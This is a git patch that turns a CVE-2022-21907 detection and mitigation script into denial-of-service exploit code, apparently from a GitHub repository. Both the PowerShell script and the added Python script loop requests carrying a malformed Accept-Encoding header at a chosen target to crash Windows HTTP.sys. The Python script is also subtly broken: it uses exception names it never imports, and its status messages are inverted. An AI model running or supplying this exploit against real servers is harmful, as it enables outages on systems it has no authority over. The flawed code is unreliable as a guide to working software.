From 0672dc0ccc1524313fbf9744b70aa3b635a700d1 Mon Sep 17 00:00:00 2001
From: mauricelambert <50479118+mauricelambert@users.noreply.github.com>
Date: Wed, 19 Jan 2022 13:22:29 +0100
Subject: [PATCH] Add powershell and python exploit

---
 CVE-2022-21907.ps1 | 57 +++++++++++++++++++++----------
 CVE202221907.py    | 85 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 124 insertions(+), 18 deletions(-)
 create mode 100644 CVE202221907.py

diff --git a/CVE-2022-21907.ps1 b/CVE-2022-21907.ps1
index d69b6bc..890d002 100644
--- a/CVE-2022-21907.ps1
+++ b/CVE-2022-21907.ps1
@@ -1,5 +1,5 @@
-﻿###################
-#    Detect and protect CVE-2022-21907.
+###################
+#    This script exploit the CVE-2022-21907 for a DOS (Denial of Service) attack (Blue Screen).
 #    Copyright (C) 2022  Maurice Lambert
 
 #    This program is free software: you can redistribute it and/or modify
@@ -16,23 +16,44 @@
 #    along with this program.  If not, see <https://www.gnu.org/licenses/>.
 ###################
 
-$license="GPL-3.0 License"
+[CmdletBinding()]
+param(
+    [Parameter(Mandatory)]
+    [string] $target
+)
 
-Write-Host "
+$license = "GPL-3.0 License"
+$copyright = @"
 CVE-2022-21907  Copyright (C) 2022  Maurice Lambert
 This program comes with ABSOLUTELY NO WARRANTY.
 This is free software, and you are welcome to redistribute it
-under certain conditions.
-"
-
-# Only detect
-
-$ErrorActionPreference="SilentlyContinue";$_=($(Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\  -Name EnableTrailerSupport).EnableTrailerSupport -or $(Write-Host "Not vulnerable to CVE-2022-2190")) -and $(Write-Host "$env:computername vulnerable to CVE-2022-2190 !")
-
-$ErrorActionPreference="SilentlyContinue";$key=Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\  -Name EnableTrailerSupport;if($key -AND $key.EnableTrailerSupport -ne 0){echo "$env:computername vulnerable to CVE-2022-2190 !"}else{echo "Not vulnerable to CVE-2022-2190"}
-
-# With protection
-
-$ErrorActionPreference="SilentlyContinue";$key=Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\  -Name EnableTrailerSupport;if($key -AND $key.EnableTrailerSupport -ne 0){echo "$env:computername vulnerable to CVE-2022-2190 ! Change EnableTrailerSupport value to 0";Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\  -Name EnableTrailerSupport -Value 0}else{echo "Not vulnerable to CVE-2022-2190"}
-
-$ErrorActionPreference="SilentlyContinue";$_=($(Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\  -Name EnableTrailerSupport).EnableTrailerSupport -or $(Write-Host "Not vulnerable to CVE-2022-2190")) -and ($(Write-Host "$env:computername vulnerable to CVE-2022-2190 ! Change EnableTrailerSupport value to 0") -or $(Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\  -Name EnableTrailerSupport -Value 0))
+under certain conditions. 
+"@
+
+write $copyright
+
+$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
+$session.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.62"
+
+$headers = @{
+    "Cache-Control"="max-age=0" 
+    "sec-ch-ua"="`" Not;A Brand`";v=`"99`", `"Microsoft Edge`";v=`"97`", `"Chromium`";v=`"97`"" 
+    "sec-ch-ua-mobile"="?0" 
+    "sec-ch-ua-platform"="`"Windows`"" 
+    "Upgrade-Insecure-Requests"="1" 
+    "Accept"="text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
+    "Sec-Fetch-Site"="none" 
+    "Sec-Fetch-Mode"="navigate" 
+    "Sec-Fetch-User"="?1" 
+    "Sec-Fetch-Dest"="document" 
+    "Accept-Encoding"="AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ," 
+    "Accept-Language"="fr,fr-FR;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6" 
+    "If-None-Match"="`"ef66c67b14dd81:0`"" 
+    "If-Modified-Since"="Wed, 19 Jan 2022 09:11:03 GMT"
+}
+
+
+$ErrorActionPreference="Stop"
+while(1) {
+    Invoke-WebRequest -UseBasicParsing -Uri "http://$target/" -WebSession $session -Headers $headers
+}
\ No newline at end of file
diff --git a/CVE202221907.py b/CVE202221907.py
new file mode 100644
index 0000000..3e2ecbb
--- /dev/null
+++ b/CVE202221907.py
@@ -0,0 +1,85 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+"""
+This script exploit the CVE-2022-21907 for a DOS (Denial of Service) attack (Blue Screen).
+
+>>> import CVE202221907
+
+~# python3 CVE202221907.py
+"""
+
+###################
+#    This script exploit the CVE-2022-21907 for a DOS (Denial of Service) attack (Blue Screen).
+#    Copyright (C) 2022  Maurice Lambert
+
+#    This program is free software: you can redistribute it and/or modify
+#    it under the terms of the GNU General Public License as published by
+#    the Free Software Foundation, either version 3 of the License, or
+#    (at your option) any later version.
+
+#    This program is distributed in the hope that it will be useful,
+#    but WITHOUT ANY WARRANTY; without even the implied warranty of
+#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+#    GNU General Public License for more details.
+
+#    You should have received a copy of the GNU General Public License
+#    along with this program.  If not, see <https://www.gnu.org/licenses/>.
+###################
+
+__version__ = "1.0.0"
+__author__ = "Maurice Lambert"
+__author_email__ = "mauricelambert434@gmail.com"
+__maintainer__ = "Maurice Lambert"
+__maintainer_email__ = "mauricelambert434@gmail.com"
+__description__ = """
+This script exploit the CVE-2022-21907 for a DOS (Denial of Service) attack (Blue Screen).
+"""
+license = "GPL-3.0 License"
+__url__ = "https://github.com/mauricelambert/CVE-2022-21907"
+
+copyright = """
+CVE-2022-21907  Copyright (C) 2022  Maurice Lambert
+This program comes with ABSOLUTELY NO WARRANTY.
+This is free software, and you are welcome to redistribute it
+under certain conditions.
+"""
+__license__ = license
+__copyright__ = copyright
+
+__all__ = []
+
+print(copyright)
+
+from urllib.request import Request, urlopen
+from sys import exit, stderr
+
+host = input("Target: ")
+
+headers = {
+    "Accept-Encoding": 'AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,'
+}
+
+try:
+    response  = urlopen(f"http://{host}")
+except (URLError, HTTPError) as e:
+    pass
+except Exception as e:
+    print(f"http://{host} is not DOWN.")
+    print(f"{e.__class__}: {e}", file = stderr)
+    exit(1)
+
+print(f"http://{host} is not UP. Start hacking...")
+
+while True:
+    try:
+        response  = urlopen(Request(f"http://{host}", headers=headers))
+    except TimeoutError as e:
+    	print(f"http://{host} is not DOWN. {host} is vulnerable to CVE-2022-21907.")
+    	exit(0)
+    except (URLError, HTTPError) as e:
+    	pass
+    except Exception as e:
+        print(f"{e.__class__}: {e}")
+
+    print(f"Payload sent successfully. Try new request...")